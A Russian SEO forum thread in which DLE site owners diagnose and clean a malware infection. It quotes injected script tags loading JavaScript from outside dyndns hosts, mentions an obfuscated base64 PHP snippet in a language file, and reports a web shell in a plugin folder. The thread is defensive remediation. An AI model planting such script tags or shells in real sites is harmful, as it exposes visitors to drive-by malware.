Вирус на DLE(сайты андроид тематики)

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Программная часть

2 страниц

< 1 2

Вирус на DLE(сайты андроид тематики)

Опции

predator-hoi

Topic Starter сообщение

4.1.2013, 1:42; Ответить: predator-hoi

Сообщение #11

Завсегдатай

Группа: Active User
Сообщений: 595
Регистрация: 30.8.2009
Поблагодарили: 87 раз
Репутация:

Доброго времени суток!
Недавно яша пометил пару сайтов андроид тематики вот так - «Этот сайт может угрожать безопасности вашего компьютера»
Написал платонам они ответили вот что:

Здравствуйте!

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:

<script src="http://define-variable.dyndns.biz/live255.php" type="text/javascript"></script>

Начал искать вручную так нечего и не нашел, написал опять яшке, вот что они ответили во втором письме:

Здравствуйте!

Страницы указаны в разделе Безопасность в Яндекс.Вебмастере. Код я приводил в прошлом письме, он находится в самом начале страницы, перед строкой

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

В итоге я заразу нашел, просто когда ты залогинен на сайте ее не видно, а когда разлогинен она есть в самом начале первая строка:

<script src="http://define-variable.dyndns.biz/live255.php" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

Все блоки на сайте ужасно поехали. Смотрел выдачу по своим ключам, очень много сайтов с такой же пометкой.
Кто сталкивался с подобной проблемой, куда копать, как лечить пациента?

--------------------

$$$ Конвертим RU/UA траф по Белому $$$

Ответить с цитированием данного сообщения

superangelochek superangelochek 2.3.2013, 1:53; Сообщений: 3 Поблагодарили: 1 раз Репутация: 0 Просмотр профиля	2.3.2013, 1:53; Ответить: superangelochek Сообщение #12
Новичок Группа: Viewer Сообщений: 3 Регистрация: 5.2.2012 Поблагодарили: 1 раз Репутация: 0	Rampage, Помогите, пожалуйста, у меня появилась аналогичная проблема! <script src="http://setthisfuckingsoft.dyndns.tv/showforum.php?pid=54543" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru"> (ЛС пока писать не могу)

kagtus kagtus 2.3.2013, 14:06; Сообщений: 421 Поблагодарили: 95 раз Репутация: 22 Просмотр профиля	2.3.2013, 14:06; Ответить: kagtus Сообщение #13
Бывалый Группа: User Сообщений: 421 Регистрация: 11.10.2012 Из: Kostroma Поблагодарили: 95 раз Репутация: 22	очищу, стучите в аську... -------------------- ася 45два48499два удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ

superangelochek superangelochek 2.3.2013, 20:23; Сообщений: 3 Поблагодарили: 1 раз Репутация: 0 Просмотр профиля	2.3.2013, 20:23; Ответить: superangelochek Сообщение #14
Новичок Группа: Viewer Сообщений: 3 Регистрация: 5.2.2012 Поблагодарили: 1 раз Репутация: 0	Проблема решена. Может кому пригодится: вредоносный код был в конце файла \language\Russian\website.lng (начало <?$GLOBALS['_intled_']=Array(base64_decode конец post_new(); ?> ). И еще был файл с расширением .php в \uploads\fotos. Как я поняла, вредоносный код был загружен на сайт с аватаром. Поблагодарили: (1) weber76

weber76 weber76 2.3.2013, 20:44; Сообщений: 107 Поблагодарили: 28 раз Репутация: 8 Просмотр профиля	2.3.2013, 20:44; Ответить: weber76 Сообщение #15
Участник Группа: User Сообщений: 107 Регистрация: 3.9.2011 Поблагодарили: 28 раз Репутация: 8	сенкс, подчищал тут несколько своих сайтов, думал везде выковырял заразу, а в языковые файлы не посмотрел, сидело и там, а вообще айболит хорошая вещь, проверьтесь наверняка и шелл у вас залит Сообщение отредактировал weber76 - 2.3.2013, 20:45 -------------------- Помощь с Wordpress, Joomla, DLE. Удалю вирусы с сайта. Поблагодарили: (1) superangelochek

superangelochek superangelochek 2.3.2013, 22:30; Сообщений: 3 Поблагодарили: 1 раз Репутация: 0 Просмотр профиля	2.3.2013, 22:30; Ответить: superangelochek Сообщение #16
Новичок Группа: Viewer Сообщений: 3 Регистрация: 5.2.2012 Поблагодарили: 1 раз Репутация: 0	Спасибо. С помощью айболита удалось найти шелл. Была создана левая папка /engine/editor/jscripts/tiny_mce/plugins/spellchecker/xml.php Подскажите, пожалуйста, те файлы, которые айболит выводит в "Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт" обязательно содержат шеллы? Я все помеченные файлы заменила оригинальными, но айболит все равно их выводит в этом разделе при новой проверке.

Remy Remy 3.3.2013, 15:03; Сообщений: 342 Поблагодарили: 52 раза Репутация: 9 Просмотр профиля	3.3.2013, 15:03; Ответить: Remy Сообщение #17
Бывалый Группа: User Сообщений: 342 Регистрация: 2.2.2011 Из: Марокко Поблагодарили: 52 раза Репутация: 9	Проверьте файлы: index.php engine.php dbcofig.php language\Russian\website.lng установите патч для версий ниже dle 9.7 c официального сайта. -------------------- Арбитражник палит темы, жми! Поблагодарили: (1) superangelochek

Damrai Damrai 5.3.2013, 17:58; Сообщений: 1 Поблагодарили: 0 раз Репутация: 0 Просмотр профиля	5.3.2013, 17:58; Ответить: Damrai Сообщение #18
Новичок Группа: Viewer Сообщений: 1 Регистрация: 9.4.2011 Поблагодарили: 0 раз Репутация: 0	Подскажите пожалуйста как можно закрыть доступ лазанья шелом по другим деректориям? На моем хостинг акуанте sweb.ru несколько сайтов один был на DLE 9.5 Взломав его залили шел и через шелл нагадили на основной сайт.Я нашел сам шелл удалил и сейчас ищу способ как можно защитить другие деректории если снова зальют шелл.Когда-то видел в нете способ закрытия через .htaccess но найти немогу.

sir95

6.3.2013, 2:52; Ответить: sir95

Сообщение #19

Новичок

Группа: Viewer
Сообщений: 12
Регистрация: 30.6.2010
Из: Украина
Поблагодарили: 1 раз
Репутация:

-2

Damrai,
Никак. Если я Вас правильно понял, то Вам залили на 1 сайт шелл, и на соседей тоже, которые на Вашем аккаунте.
К сожалению, это не сделать на хостинге, есть некоторые, но большинство берет VDS и сами настраивают пути для каждого сайта отдельно.
Через .htaccess, Вы можете запретить запуск вредоносного скрипта.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой

или обратитесь к любому из модераторов.

Поблагодарили: (1)

Damrai

« Предыдущая тема · Программная часть · Следующая тема »

2 страниц

< 1 2

2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Сайты уходят в прошлое для развития бизнеса стали не столь актуальны	158	muratastana	31507	Сегодня, 6:28 автор: Skyworker
Нужна програмка постинга в свои сайты	0	kasey7	340	22.4.2024, 19:54 автор: kasey7
Продам свои сайты 10 сайтов на продажу	3	ArchiDOM	1483	5.4.2024, 3:51 автор: Llirik
Оптом и в розницу, скупаю ссылки околомедицинской тематики.	3	kasey7	2111	4.4.2024, 19:12 автор: kasey7
Есть смысл создавать сайты на латышском?	16	Nekit	4061	31.3.2024, 1:23 автор: Liudmila

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 25.4.2024, 7:39

Дизайн